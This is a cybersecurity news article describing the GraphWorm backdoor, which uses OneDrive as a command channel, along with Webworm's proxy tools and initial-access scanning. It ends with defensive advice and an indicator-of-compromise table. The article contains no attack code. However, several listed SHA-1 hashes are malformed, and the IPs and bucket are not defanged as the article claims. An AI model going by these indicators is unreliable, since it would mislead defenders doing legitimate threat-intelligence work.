GraphWorm Malware Uses Microsoft OneDrive as Command-and-Control Infrastructure

Discover more Cybersecurity training courses Security audit services Malware analysis tools HomeCyber Security News GraphWorm Malware Uses Microsoft OneDrive as Command-and-Control Infrastructure By Tushar Subhra Dutta May 20, 2026 A well-known China-aligned threat group has quietly evolved its attack methods, and its latest toolset reveals just how far it is willing to go to stay hidden. A backdoor called GraphWorm has surfaced as part of this group’s growing arsenal, and what makes it stand out is the way it uses Microsoft OneDrive as its command-and-control channel. Instead of communicating with suspicious servers, it hides its activity inside one of the world’s most trusted cloud platforms. The threat group behind GraphWorm is tracked as Webworm, a China-aligned operation that has been active since at least 2017 and has steadily expanded its reach. Initially focused on organizations across Asia, the group has since shifted its attention toward European targets, including government bodies in Belgium, Italy, Serbia, and Poland. It has also targeted a university in South Africa, showing that its scope continues to widen. WeLiveSecurity said in a report shared with Cyber Security News said that they identified the malware and published their findings on the group’s updated techniques. Forked WordPress repository (Source – Welivesecurity) They noted that Webworm had previously relied on well-known backdoors like McRat and Trochilus, but has now moved away from those tools in favor of stealthier, custom-built options. GraphWorm is one of two new backdoors added to the group’s toolkit, alongside a Discord-based backdoor called Choreerp. GraphWorm, also referred to internally as OverOneDrive, is written in Go and uses Microsoft’s Graph API to communicate exclusively through OneDrive. GraphWorm Malware Uses Microsoft OneDrive This approach makes its traffic look like ordinary cloud activity, which helps it slip past many security tools. A separate folder is created in OneDrive for each victim, and three subfolders handle different tasks: storing files, receiving job instructions, and sending back results from commands run on the infected machine. History of nuclei and dirsearch (Source – Welivesecurity) The group’s initial access techniques also offer a window into how victims first get compromised. Webworm operators were found using open-source tools like Nuclei, a vulnerability scanner, and dirsearch, a web path scanner, against targets in Spain, Hungary, Belgium, Nigeria, Czechia, and Serbia. A script exploiting a known post-authentication remote code execution flaw in SquirrelMail was also found in use, suggesting the group is actively hunting for exposed web applications as entry points. GraphWorm sets itself apart by routing all communications through a legitimate Microsoft OneDrive instance rather than a dedicated server. Upon first execution, the backdoor generates a unique victim identifier by combining network adapter details, processor information, and a device serial number. It then creates or renames a OneDrive folder using this ID, ensuring each compromised machine has its own isolated workspace in the cloud. Commands supported by the backdoor include uploading and downloading files, executing shell commands through cmd.exe, and adjusting sleep intervals. Results from executed commands are written to a file named beaconshelloutput.txt and then uploaded back to OneDrive using Microsoft’s createUploadSession API endpoint. Since the backdoor works entirely within a cloud environment, it can handle large file uploads without raising typical red flags. Webworm’s Expanding Proxy Infrastructure Beyond the two new backdoors, Webworm has built an extensive proxy network using a combination of open-source and custom tools. These include Wormsrp, a custom fork of the fast reverse proxy tool frp; ChainWorm, which chains multiple proxy hops together; SmuxProxy, based on the port-forwarding tool iox; and WormSocket, which routes traffic through websocket connections. Each of these tools adds another layer between the attacker and their victim, making it harder to trace activity back to its source. The group also used a compromised Amazon S3 bucket at wamanharipethe.s3.ap-south-1.amazonaws.com to store and retrieve configuration files for some of these proxy tools. Files found in the bucket included virtual machine snapshots containing configuration data from a government entity in Italy and documents exfiltrated from a government body in Spain. Security teams are advised to monitor for unusual outbound connections to cloud storage services, audit scheduled tasks and registry run keys for unauthorized entries, and watch for processes using cmd.exe or powershell.exe to download files from external sources. Indicators of Compromise (IoCs):- Type Indicator Description SHA-1 Hash 50433336707381429707F59C3CBE8D497D98 SearchApp.exe — Win/Agent.KBuf SHA-1 Hash 1DF40A4A31B30B62EC33DC6FECC2C4408302ADC7 ssh.exe — Win/Hack Tool/Proxy.WQ SHA-1 Hash 7DCFE9EE25841DFD58D3D6871BF867FE32141DFB svc.exe — MSIL/Hack Tool/Proxy.WQ SHA-1 Hash 7F1970D620216C5FFF4E14A6CCC13FCCC267217C2 OverOneDrivev0316.exe — Win/Agent.78CV.M SHA-1 Hash 48159A7FC2E688386864BEA59FD40DFFC4B24D6 MessengerClient.exe — MSIL/Hack Tool/Proxy.WQ SHA-1 Hash A3C077BDF8898E612CCD65BC82E7960834ADB2A9 dsocks.exe — Win/RiskWare/iox Domain/URL wamanharipethe.s3.ap-south-1.amazonaws.com Compromised S3 bucket used for config and data exfiltration IP Address 45.77.13.67 Vultr Holdings — Wormsrp web server IP Address 64.176.85.158 The Constant Company — Wormsrp web server IP Address 104.243.23.43 Networksoc — SmuxProxy server IP Address 108.61.200.151 Vultr Holdings — Wormsrp proxy IP Address 144.168.60.233 Networksoc — Reverse proxy/Edison service Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News Critical n8n Vulnerabilities Expose Automation Nodes to Full RCE Amazon Redshift JDBC Driver Vulnerabilities Enables Remote Code Execution Attacks Microsoft Exchange, Windows 11, and Cursor Zero-Days Exploited on Pwn2Own Day 2 Nx Console VS Code Extension Compromised to Steal Developer and Cloud Secrets GitHub Hacked – Internal Source Code Repositories Compromised via Employee Device Latest News Cyber Security News New NGINX Vulnerability Allow Remote Attackers to Trigger Malicious Code Cyber Security News Fox Tempest Malware-Signing Service Abused Microsoft Artifact Signing to Certify Malware Cyber Attack News GitHub Hacked – Internal Source Code Repositories Compromised via Employee Device Cyber Security News PoC Exploit Released for 20-Year Old PostgreSQL RCE Vulnerability Cyber Security News ShinyHunters Claims Credit for Cyber-Attack on Online Learning Management System